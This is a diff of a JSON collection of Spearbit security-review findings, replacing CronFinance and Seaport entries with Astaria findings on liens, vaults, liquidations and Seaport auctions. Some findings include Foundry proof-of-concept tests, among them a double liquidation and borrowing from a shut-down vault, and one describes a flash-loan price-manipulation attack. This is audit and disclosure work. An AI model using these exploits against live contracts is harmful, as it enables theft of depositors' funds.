strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenIdTwo, lienDetails: ILienToken.Details({ maxAmount: 50 ether, rate: (uint256(1e16) * 150) / (365 days), duration: 10 days, maxPotentialDebt: 0 ether, liquidationInitialAsk: 100 ether }), amount: 10 ether }); uint256 collateralIdOne = tokenContract.computeId(tokenIdOne); uint256 collateralIdTwo = tokenContract.computeId(tokenIdTwo); // verify the strategist has no shares minted assertEq( PublicVault(payable(publicVault)).balanceOf(strategistOne), 0, \"Strategist has incorrect share balance\" ); // verify that the borrower has the CollateralTokens assertEq( COLLATERAL_TOKEN.ownerOf(collateralIdOne), address(this), \"CollateralToken not minted to borrower\" ); assertEq( COLLATERAL_TOKEN.ownerOf(collateralIdTwo), address(this), \"CollateralToken not minted to borrower\" ); // fast forward to the end of lien one vm.warp(block.timestamp + 10 days); address liquidatorOne = vm.addr(0x1195da7051); address liquidatorTwo = vm.addr(0x1195da7052); vm.label(liquidatorOne, \"liquidator 1\"); vm.label(liquidatorTwo, \"liquidator 2\"); // liquidate the first lien vm.startPrank(liquidatorOne); OrderParameters memory listedOrder = _liquidate(stackOne); vm.stopPrank(); assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralIdOne), liquidatorOne, \"liquidator is not stored in s.collateralLiquidator[collateralId]\" ); // liquidate the first lien again with a different liquidator vm.startPrank(liquidatorTwo); listedOrder = _liquidate(stackOne); vm.stopPrank(); assertEq( LIEN_TOKEN.getAuctionLiquidator(collateralIdOne), liquidatorTwo, \"liquidator is not stored in s.collateralLiquidator[collateralId]\" ); // validate the slope is updated twice for the same expired lien // and so the accounting for the public vault is manipulated assertEq( PublicVault(payable(publicVault)).getSlope(), 0, \"PublicVault slope divergent\" ); // publicVault.storageSlot.epochData[epoch].liensOpenForEpoch is also decremented twice // CollateralToken.storageSlot.idToUnderlying[params.collateralId].auctionHash can also be manipulated }
", "labels": [ - "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Spearbit", + "Astaria", + "Severity: Critical Risk" ] }, { - "title": "Factory requirement can be circumvented within the constructor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The constructor checks if the _factory parameter is the msg.sender. This behavior was, at first, created so that only the factory would be able to deploy pools. The check on line 484 is obsolete, as pools deployed via the factory will always have msg.sender == factory address, making the _factory parameter obsolete as well.", + "title": "maxStrategistFee is incorrectly set in AstariaRouter's constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In AstariaRouter's constructor we set the maxStrategistFee as s.maxStrategistFee = uint256(50e17); // 5e18 But in the file route we check that this value should not be greater than 1e18. maxStrategistFee is supposed to set an upper bound for public vaults' strategist vault fee. When a payment is made for a lien, one calculates the shares to be minted for the strategist based on this value and the interest amount paid: function _handleStrategistInterestReward( VaultData storage s, uint256 interestPaid ) internal virtual { if (VAULT_FEE() != uint256(0) && interestPaid > 0) { uint256 fee = interestPaid.mulWadDown(VAULT_FEE()); uint256 feeInShares = convertToShares(fee); _mint(owner(), feeInShares); } } Note that we are using mulWadDown(...) here: F = floor(I * f / 10^18), where F is the fee, f is VAULT_FEE() and I is interestPaid, so we would want f <= 10^18. Currently, a vault could charge 5 times the interest paid.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Gas Optimization" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Usability: added remove, set pool functionality to CronV1PoolFactory (Changes from dev team added to audit.)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Conversations with the audit team indicated functions were needed to manage pool mappings post-creation in the event that a pool needed to be deprecated or replaced.", + "title": "When a vault is shutdown a user can still commit to liens using the vault", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "When a vault is shutdown, one should not be able to take more liens using the funds from this vault. In the commit-to-lien flow, AstariaRouter fetches the state of the vault: ( , address delegate, address owner, , , // s.isShutdown uint256 nonce, bytes32 domainSeparator ) = IVaultImplementation(c.lienRequest.strategy.vault).getState(); But it does not use the s.isShutdown flag to stop the flow if it is set to true.
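A minimal sketch of the missing guard (the isShutdown value is the slot skipped in the destructuring above; the error name is hypothetical): ( , address delegate, address owner, bool isShutdown, , uint256 nonce, bytes32 domainSeparator ) = IVaultImplementation(c.lienRequest.strategy.vault).getState(); if (isShutdown) { revert VaultIsShutdown(); } // reject commitToLien on shutdown vaults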
When a vault is shutdown we should have the following behavior (vault endpoint: should revert): deposit: YES, mint: YES, redeem: NO, withdraw: NO, redeemFutureEpoch: NO, payment flows: NO, liquidation flows: NO, commitToLien: YES. // add this test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol // Scenario 12: create vault > shutdown > commitToLien function testScenario12() public { { console2.log(\"--- test private vault shutdown ---\"); uint256 ownerPK = uint256(0xa77ac3); address owner = vm.addr(ownerPK); vm.label(owner, \"owner\"); uint256 lienId; TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); address privateVault = _createPrivateVault(owner, owner); vm.label(privateVault, \"privateVault\"); console2.log(\"[+] private vault is created: %s\", privateVault); // lend 1 wei to the privateVault _lendToPrivateVault( PrivateLender({addr: owner, amountToLend: 1 wei, token: address(WETH9)}), payable(privateVault) ); console2.log(\"[+] lent 1 wei to the private vault.\"); console2.log(\"[+] shutdown private vault.\"); vm.startPrank(owner); Vault(payable(privateVault)).shutdown(); vm.stopPrank(); assertEq( Vault(payable(privateVault)).getShutdown(), true, \"Private Vault should be shutdown.\" ); // borrow 1 wei against the dummy NFT (lienId, ) = _commitToLien({ vault: payable(privateVault), strategist: owner, strategistPK: ownerPK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 1 wei, revertMessage: \"\" }); console2.log(\"[+] borrowed 1 wei against the private vault.\"); console2.log(\" lienId: %s\", lienId); console2.log(\" owner of lienId: %s\\n\\n\", LIEN_TOKEN.ownerOf(lienId)); assertEq( LIEN_TOKEN.ownerOf(lienId), owner, \"owner should be the owner of the lienId.\" ); } { console2.log(\"--- test public vault shutdown ---\"); uint256 ownerPK = uint256(0xa77ac322); address owner = vm.addr(ownerPK); vm.label(owner, \"owner\"); uint256 lienId; TestNFT nft = new TestNFT(1); address tokenContract = address(nft); uint256 tokenId = uint256(0); address publicVault = _createPublicVault(owner, owner, 14 days); vm.label(publicVault, \"publicVault\"); console2.log(\"[+] public vault is created: %s\", publicVault); // lend 1 ether to the publicVault _lendToVault( Lender({addr: owner, amountToLend: 1 ether}), payable(publicVault) ); console2.log(\"[+] lent 1 ether to the public vault.\"); console2.log(\"[+] shutdown public vault.\"); vm.startPrank(owner); Vault(payable(publicVault)).shutdown(); vm.stopPrank(); assertEq( Vault(payable(publicVault)).getShutdown(), true, \"Public Vault should be shutdown.\" ); // borrow 1 wei against the dummy NFT (lienId, ) = _commitToLien({ vault: payable(publicVault), strategist: owner, strategistPK: ownerPK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: ILienToken.Details({ maxAmount: 1 wei, rate: 1, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 1 ether }), amount: 1 wei, revertMessage: \"\" }); console2.log(\"[+] borrowed 1 wei against the public vault.\"); console2.log(\" lienId: %s\", lienId); console2.log(\" owner of lienId: %s\", LIEN_TOKEN.ownerOf(lienId)); assertEq( LIEN_TOKEN.ownerOf(lienId), publicVault, \"Public vault should be the owner of the lienId.\" ); } } forge t --mt testScenario12 --ffi -vvv: --- test private vault shutdown --- [+] private vault is created: 0x7BF14E2ad40df80677D356099565a08011B72d66 [+] lent 1 wei to the private vault.
[+] shutdown private vault. [+] borrowed 1 wei against the private vault. lienId: 78113226609386929237635937490344951966356214732432064308195118046023211325984 owner of lienId: 0x60873Bc6F2C9333b465F60e461cf548EfFc7E6EA --- test public vault shutdown --- [+] public vault is created: 0x5b1A54d097AA8Ce673b6816577752F6dfc10Ddd6 [+] lent 1 ether to the public vault. [+] shutdown public vault. [+] borrowed 1 wei against the public vault. lienId: 13217102800774263219074199159187108198090219420208960450275388834853683629020 owner of lienId: 0x5b1A54d097AA8Ce673b6816577752F6dfc10Ddd6", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Virtual oracle getter--gets oracle value at block > lvob (Changes from dev team added to audit.)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "Through the audit process, sufficient contract space became available to add an oracle getter convenience that returns the oracle values and timestamps. However, this leaves the problem of not being able to get the oracle price at the current block in a pool with low volume but virtual orders active.", + "title": "transfer(...) function in _issuePayout(...) can be replaced by a direct call", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In the _issuePayout(...) internal function of the VaultImplementation, if the asset is WETH the amount is withdrawn from WETH to native tokens and then transferred to the borrower: if (asset() == WETH()) { IWETH9 wethContract = IWETH9(asset()); wethContract.withdraw(newAmount); payable(borrower).transfer(newAmount); } transfer limits the amount of gas shared with the call to the borrower, which would prevent executing a complex callback, and due to changes in EVM gas prices it might even break some feature for a potential borrower contract. For the analysis of the flow for both types of vaults please refer to the following issue: 'Storage parameters are updated after a few callback sites to external addresses in the commitToLien(...) flow'", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Loss of assets due to rounding during _longTermSwap", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "When a long term swap (LT) is created, the selling rate for that LT is set based on the amount and the number of blocks that order will be traded for. uint256 lastExpiryBlock = block.number - (block.number % ORDER_BLOCK_INTERVAL); uint256 orderExpiry = ORDER_BLOCK_INTERVAL * (_orderIntervals + 1) + lastExpiryBlock; // +1 protects from div 0 uint256 tradeBlocks = orderExpiry - block.number; uint256 sellingRateU112 = _amountInU112 / tradeBlocks; During the computation of the number of blocks the order must trade for, defined as tradeBlocks, the order expiry is computed from the last expiry block based on the OBI (Order Block Interval). If tradeBlocks is big enough (it can be a max of 176102 based on the STABLE_MAX_INTERVALS), then sellingRateU112 will suffer a loss due to solidity's rounding-down behavior. This is a manageable loss for tokens with big decimals, but for tokens with low decimals it will create quite an impact. E.g. wrapped BTC has 8 decimals.
The MAX_ORDER_INTERVALS can be at most 176102, as per the stable max intervals defined within the constants. That being said, a user can lose quite a significant value of BTC: 0.00176101. This issue is marked as Informational severity as the amount lost might not be that significant. This can change in the future if the token being LTed has a big value and a small number of decimals.", + "title": "Storage parameters are updated after a few callback sites to external addresses in the commitToLien(...) flow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In the commitToLien(...) flow, the following storage parameters are updated after some of the external callback sites where a payout is issued or a lien is transferred from a private vault to its owner: collateralStateHash in LienToken: one can potentially re-enter to take another lien using the same collateral, but this is not possible since the collateral NFT token is already transferred to the CollateralToken (unless one is dealing with some esoteric NFT token). The createLien(...) requires this parameter to be 0, and that's why a potential re-entrancy can bypass this requirement. Read re-entrancy: yes. slope in PublicVault: read re-entrancy: yes. liensOpenForEpoch in PublicVault: if flash liens are allowed, one can re-enter and process the epoch before finishing the commitToLien(...), and so the processed epoch would have open liens even though we would want to make sure this could not happen. Read re-entrancy: yes. The re-entrancies can happen if the vault asset performs a callback to the receiver when transferring tokens (during issuance of payouts), and, if one is dealing with WETH, when the native token amount is sent with transfer(...) to the borrower. Note that in the case of native tokens, if the recommendation from the following issue is considered, the current issue could be of higher risk: 'transfer(...) function in _issuePayout(...) can be replaced by a direct call'", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Inaccuracies in Comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A number of minor inaccuracies were discovered in comments that could impact the comprehensibility of the code to future maintainers, integrators, and extenders. [1] bit-0 should be bit-1 [2] less than should be at most [3] Maximally Extracted Value should be Maximal Extractable Value, see flashbots.net [4] Maximally Extracted Value should be Maximal Extractable Value, see flashbots.net [5] on these lines unsold should be sold [6] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop on line 54. [7] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop on line 111. [8] omitted should be emitted", + "title": "UNI_V3Validator fetches spot prices that may lead to price manipulation attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "UNI_V3Validator.validateAndParse() checks the state of the Uniswap V3 position. This includes checking the LP value through LiquidityAmounts.getAmountsForLiquidity.
//get pool state //get slot 0 (uint160 poolSQ96, , , , , , ) = IUniswapV3PoolState( V3_FACTORY.getPool(token0, token1, fee) ).slot0(); (uint256 amount0, uint256 amount1) = LiquidityAmounts .getAmountsForLiquidity( poolSQ96, TickMath.getSqrtRatioAtTick(tickLower), TickMath.getSqrtRatioAtTick(tickUpper), liquidity ); LiquidityAmounts.sol#L177-L221 When we deep dive into getAmountsForLiquidity, we see three cases: the price is below the range, the price is within the range, and the price is above the range. function getAmountsForLiquidity( uint160 sqrtRatioX96, uint160 sqrtRatioAX96, uint160 sqrtRatioBX96, uint128 liquidity ) internal pure returns (uint256 amount0, uint256 amount1) { unchecked { if (sqrtRatioAX96 > sqrtRatioBX96) (sqrtRatioAX96, sqrtRatioBX96) = (sqrtRatioBX96, sqrtRatioAX96); if (sqrtRatioX96 <= sqrtRatioAX96) { amount0 = getAmount0ForLiquidity( sqrtRatioAX96, sqrtRatioBX96, liquidity ); } else if (sqrtRatioX96 < sqrtRatioBX96) { amount0 = getAmount0ForLiquidity( sqrtRatioX96, sqrtRatioBX96, liquidity ); amount1 = getAmount1ForLiquidity( sqrtRatioAX96, sqrtRatioX96, liquidity ); } else { amount1 = getAmount1ForLiquidity( sqrtRatioAX96, sqrtRatioBX96, liquidity ); } } } For simplicity, we can focus on getAmount1ForLiquidity: /// @notice Computes the amount of token1 for a given amount of liquidity and a price range /// @param sqrtRatioAX96 A sqrt price representing the first tick boundary /// @param sqrtRatioBX96 A sqrt price representing the second tick boundary /// @param liquidity The liquidity being valued /// @return amount1 The amount of token1 function getAmount1ForLiquidity( uint160 sqrtRatioAX96, uint160 sqrtRatioBX96, uint128 liquidity ) internal pure returns (uint256 amount1) { unchecked { if (sqrtRatioAX96 > sqrtRatioBX96) (sqrtRatioAX96, sqrtRatioBX96) = (sqrtRatioBX96, sqrtRatioAX96); return FullMathUniswap.mulDiv( liquidity, sqrtRatioBX96 - sqrtRatioAX96, FixedPoint96.Q96 ); } } We find the amount is calculated as amount = liquidity * (upper price - lower price). When slot0.poolSQ96 is in the LP range, the lower price is slot0.poolSQ96; the closer slot0 is to lowerTick, the smaller amount1 is. This is vulnerable to price manipulation attacks, as IUniswapV3PoolState.slot0.poolSQ96 is effectively the spot price. Attackers can acquire huge funds through flash loans and shift the slot0 by doing large swaps on Uniswap. Assume the following scenario: the strategist signs a lien that allows the borrower to provide an ETH-USDC position with > 1,000,000 USDC and borrow 1,000,000 USDC from the vault. The attacker first provides 1 ETH worth of LP at the price range 2,000,000 ~ 2,000,001. The attacker takes a flash loan to manipulate the price of the pool so that slot0.poolSQ96 = sqrt(2,000,000) (ignoring the decimals difference). getAmountsForLiquidity values the LP position at the spot price and finds the LP has 1 * 2,000,000 USDC in the position. The attacker borrows 2,000,000, restores the price of the Uniswap pool, and takes the profit to repay the flash loan. Note that the project team has stated clearly that UNI_V3Validator will not be used before the audit.
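A common mitigation, sketched here only as an illustration and not as the report's recommendation: derive the valuation price from a TWAP via pool.observe(...) instead of the manipulable slot0 spot price (the 30-minute window below is an assumed choice; the interfaces are the Uniswap v3 ones already used above). uint32[] memory secondsAgos = new uint32[](2); secondsAgos[0] = 1800; // assumed 30-minute TWAP window secondsAgos[1] = 0; (int56[] memory tickCumulatives, ) = IUniswapV3Pool( V3_FACTORY.getPool(token0, token1, fee) ).observe(secondsAgos); int24 twapTick = int24((tickCumulatives[1] - tickCumulatives[0]) / 1800); uint160 twapSqrtPriceX96 = TickMath.getSqrtRatioAtTick(twapTick); // use twapSqrtPriceX96 in place of poolSQ96 when valuing the position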
This issue is filed to provide information to the codebase.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Unsupported SwapKind.GIVEN_OUT may limit the compatibility with Balancer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The Balancer protocol utilizes two types of swaps for its functionality - GIVEN_IN and GIVEN_OUT. GIVEN_IN specifies the minimum amount of tokens a user would accept to receive from the swap. GIVEN_OUT specifies the maximum amount of tokens a user would accept to send for the swap. However, the onSwap function of the CronV1Pool contract only accepts the IVault.SwapKind.GIVEN_IN value as the IVault.SwapKind field of the SwapRequest struct. The unsupported SwapKind.GIVEN_OUT may limit the compatibility with Balancer on the Batch Swaps and the Smart Order Router functionality, as a single SwapKind is given as an argument.", + "title": "Users pay protocol fee for interests they do not get", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The PublicVault._handleStrategistInterestReward() function currently charges a protocol fee by minting vault shares, affecting all vault LP participants. However, not every user receives interest payments. Consequently, a scenario may arise where a user deposits funds into the PublicVault before a loan is repaid, resulting in the user paying more in protocol fees than the interest earned. This approach appears to be unfair to certain users, leading to a disproportionate fee structure for those who do not benefit from the interest rewards.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "A pool's first LP will always take a minor loss on the value of their liquidity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The first liquidity provider for a pool will always take a small loss on the value of their tokens deposited into the pool because 1000 balancer pool tokens are minted to the zero address on the initial deposit. As most tokens have 18 decimal places, this value would be negligible in most cases; however, for tokens with a high value and small decimals the effects may be more apparent.", + "title": "Seaport auctions not compatible with USDT", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "As per the ERC20 specification, approve() returns a boolean: function approve(address _spender, uint256 _value) public returns (bool success) However, USDT deviates from this standard and its approve() method doesn't have a return value.
Hence, if USDT is used as a payment token, the following line reverts in validateOrder() as it expects return data but doesn't receive it: paymentToken.approve(address(transferProxy), s.LIEN_TOKEN.getOwed(stack));", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "The _withdrawCronFees function should revert if no fees to withdraw", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The _withdrawCronFees function checks if there are any Cron fees that need to be withdrawn; currently, this function does not revert in case there are no fees.", + "title": "Borrowers cannot provide slippage protection parameters when committing to a lien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "When a borrower commits to a lien, AstariaRouter calls the strategy validator to fetch the lien details: (bytes32 leaf, ILienToken.Details memory details) = IStrategyValidator( strategyValidator ).validateAndParse( commitment.lienRequest, msg.sender, commitment.tokenContract, commitment.tokenId ); details include rate, duration and liquidationInitialAsk: struct Details { uint256 maxAmount; uint256 rate; //rate per second uint256 duration; uint256 maxPotentialDebt; // not used anymore uint256 liquidationInitialAsk; } The borrower cannot provide slippage protection parameters to make sure these 3 values cannot enter into some undesired ranges.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "The spent offer amounts provided to OrderFulfilled for collection of (advanced) orders is not the actual amount spent in general", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When Seaport is called to fulfill or match a collection of (advanced) orders, the OrderFulfilled is called before applying fulfillments and executing transfers. The offer and consideration items have the following forms: C = (It, T, i, a_curr, R, a_curr) and O = (It, T, i, a_curr, a_curr), where It is the itemType, T the token, i the identifier, a_curr the interpolation of startAmount and endAmount depending on the time and the fraction of the order, R the consideration item's recipient, O an offer item and C a consideration item. The SpentItem and ReceivedItem items provided to the OrderFulfilled event ignore the last component of the offer/consideration items in the above form since they are redundant. Seaport enforces that all consideration items are used. But for the endpoints in this context, we might end up with offer items with only a portion of their amounts being spent. So in the end O.a_curr might not be the amount spent for this offer item, but OrderFulfilled emits O.a_curr as the amount spent. This can cause discrepancies in off-chain bookkeeping by agents listening for this event. The fulfillOrder and fulfillAdvancedOrder do not have this issue, since all items are enforced to be used.
These two endpoints also differ from the case when there are collections of (advanced) orders, in that they would emit the OrderFulfilled at the end of their call, before clearing the reentrancy guard.", + "title": "The liquidation's auction starting price is not chosen perfectly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "When a lien is expired and liquidated, the starting price for its Seaport auction is chosen as stack.lien.details.liquidationInitialAsk. It would make more sense to have the startingPrice be the maximum of the amount owed up to now and the stack.lien.details.liquidationInitialAsk: p_s = max(L_in, a_owed), where p_s is the starting price, L_in is liquidationInitialAsk and a_owed is the amount owed so far. For example, if the liquidate(...) endpoint is called way after the lien's expiration time, the amount owed might be bigger than the stack.lien.details.liquidationInitialAsk. When a lien is created, the protocol checks that stack.lien.details.liquidationInitialAsk is not smaller than the to-be-owed amount at the end of the lien's term. But the lien can keep accruing interest if it is not liquidated right away when it gets expired.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type is not the actual spent amount in general", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When Seaport is called to fulfill or match a collection of (advanced) orders, there are scenarios where not all offer items will be used. When not all the current amount of an offer item is used, and if this offer item belongs to an order which is of either CONTRACT order type or is a restricted order (and the caller is not the zone), then the spent amount shared with either the contract offerer or zone through their respective endpoints (validateOrder for zones and ratifyOrder for contract offerers) does not reflect the actual amount spent. When Seaport is called through one of its more complex endpoints to match or fulfill orders, the offer items go through a few phases, using the following notation: It the itemType, T the token, i the identifier, a_s the startAmount, a_e the endAmount, a_curr the interpolation of startAmount and endAmount depending on the time and the fraction of the order, and O an offer item. Let's assume an offer item is originally O = (It, T, i, a_s, a_e). In _validateOrdersAndPrepareToFulfill, O gets transformed into (It, T, i, a_curr, a_curr). Then, depending on whether the order is part of a match (1, 2, 3) or fulfillment (1, 2) order and there is a corresponding fulfillment data pointing at this offer item, it might transform into (It, T, i, b, a_curr) where b is in [0, a_curr]. For fulfilling a collection of orders b is in {0, a_curr}, depending on whether the offer item gets used or not, but for match orders it can be in the more general range [0, a_curr]. And finally, for restricted or CONTRACT order types, before calling _assertRestrictedAdvancedOrderValidity the offer item would be transformed into (It, T, i, a_curr, a_curr). So the startAmount of an offer item goes through the following flow: a_s -> a_curr -> b in [0, a_curr] -> a_curr. And at the end a_curr is the amount used when Seaport calls into the validateOrder of a zone or ratifyOrder of a contract offerer.
a_curr does not reflect the actual amount that this offer item has contributed to a combined amount used for an execution transfer.", + "title": "Canceled Seaport auctions can still be claimed by the liquidator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Canceled auctions can still be claimed by the liquidator: if ( s.idToUnderlying[collateralId].auctionHash != s.SEAPORT.getOrderHash(getOrderComponents(params, counterAtLiquidation)) ) { //revert auction params don't match revert InvalidCollateralState( InvalidCollateralStates.INVALID_AUCTION_PARAMS ); } If in the future an authorised endpoint were added that could call s.SEAPORT.incrementCounter() to cancel all outstanding NFT auctions, the liquidator could call liquidatorNFTClaim(..., counterAtLiquidation), where counterAtLiquidation is the old counter, to claim its NFT after the canceled Seaport auction ends.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "Empty criteriaResolvers for criteria-based contract orders", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "There is a deviation in how criteria-based items are resolved for contract orders. For contract orders which have offers with criteria, the _compareItems function checks that the contract offerer returned a corresponding non-criteria based itemType when identifierOrCriteria for the original item is 0, i.e., offering from an entire collection. Afterwards, the orderParameters.offer array is replaced by the offer array returned by the contract offerer. For other criteria-based orders such as offers with identifierOrCriteria = 0, the itemType of the order is only updated during the criteria resolution step. This means that for such offers there should be a corresponding CriteriaResolver struct. See the following test: modified test/advanced.spec.ts @@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { // Seller approves marketplace contract to transfer NFTs await set1155ApprovalForAll(seller, marketplaceContract.address, true); - const { root, proofs } = merkleTree([nftId]); - const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))]; + const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))]; const consideration = [ getItemETH(parseEther(\"10\"), parseEther(\"10\"), seller.address), @@ -3578,8 +3577,9 @@ getItemETH(parseEther(\"1\"), parseEther(\"1\"), owner.address), ]; + // Replacing by `const criteriaResolvers = []` will revert const criteriaResolvers = [ - buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]), + buildResolver(0, 0, 0, nftId, []), ]; const { order, orderHash, value } = await createOrder( However, in case of contract offers with identifierOrCriteria = 0, Seaport 1.2 does not expect a corresponding CriteriaResolver struct and will revert if one is provided, as the itemType was updated to be the corresponding non-criteria based itemType. See advanced.spec.ts#L510 for a test case. Note: this also means that the fulfiller cannot explicitly provide the identifier when a contract order is being fulfilled. A malicious contract may use this to their advantage. For example, assume that a contract offerer in Seaport only accepts criteria-based offers.
The fulfiller may first call previewOrder where the criteria is always resolved to a rare NFT, but the actual execution would return an uninteresting NFT. If such offers also required a corresponding resolver (similar behaviour as regular criteria-based orders), then this could be fixed by explicitly providing the identifier--akin to a slippage check. In short, for regular criteria-based orders with identifierOrCriteria = 0 the fulfiller can pick which identifier to receive by providing a CriteriaResolver (as long as it's valid). For contract orders, fulfillers don't have this option and contracts may be able to abuse this.", + "title": "The risk of bad debt is transferred to the non-redeeming shareholders and not the redeeming holders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Right before a successful processEpoch(), the total assets A equal: A = y0 + s(t - t_last) = B + sum_{s in U1} a(s, t) + sum_{(s, t_l) in U2} a(s, t_l) All the parameter values below are considered as just before calling the processEpoch() endpoint, unless stated otherwise: A = totalAssets(); y0 = yIntercept; s = slope; t_last = last timestamp used to update y0 or s; t = block.timestamp; B = ERC20(asset()).balanceOf(PublicVault), the underlying balance of the public vault; U1 = the set of active liens/stacks owned by the PublicVault (this can be non-empty due to how long the lien durations can be); U2 = the set of liquidated liens/stacks and their corresponding liquidation timestamps (t_l) which are owned by the current epoch's WithdrawProxy W_curr (these liens belong to the current epoch, but their auctions end in the next epoch duration); a(s, t) = total amount owed by the stack s up to the timestamp t; S = totalSupply(); S_W = number of shares associated with the current epoch's WithdrawProxy, currentWithdrawProxy.totalSupply(); E = currentWithdrawProxy.getExpected(); y'0 = yIntercept after calling processEpoch(); w_r = withdrawReserve, the value after calling processEpoch(); t_p = t_last after calling processEpoch(); A' = totalAssets after calling processEpoch(); W_n = the current epoch's WithdrawProxy before calling processEpoch(); W_n+1 = the current epoch's WithdrawProxy after calling processEpoch(). Also assume that claim() was already called on the previous epoch's WithdrawProxy if needed. After the call to processEpoch() (in the same block), we would have roughly (not considering the division errors): A' = y'0 + s(t - t_p) A' = (1 - S_W/S) A + sum_{s in U1} (a(s, t) - a(s, t_p)) w_r = (S_W/S) (B + sum_{s in U1} a(s, t_p)) and so: A = A' + w_r + (S_W/S) sum_{(s, t_l) in U2} a(s, t_l), i.e. -delta(A) = w_r + (S_W/S) E. To be able to call processEpoch() again, we need to make sure w_r tokens have been transferred to W_n, either from the public vault's assets B or from W_n+1 assets. Note that at this point w_r equals: w_r = (S_W/S) B + (S_W/S) sum_{s in U1} a(s, t_p) The (S_W/S) B portion is an actual asset and can be transferred to W_n right away. The (S_W/S) sum_{s in U1} a(s, t_p) portion is a percentage of the amount owed by the active liens at the time processEpoch() was called. Depending on whether these liens get paid fully or not: if they get fully paid, there are no risks for the future shareholders to bear. If these liens are not fully paid, since we have transferred (S_W/S) sum_{s in U1} a(s, t_p) from the actual asset balance to W_n, the redeeming shareholders do not take the risk of these liens getting liquidated for less than their value.
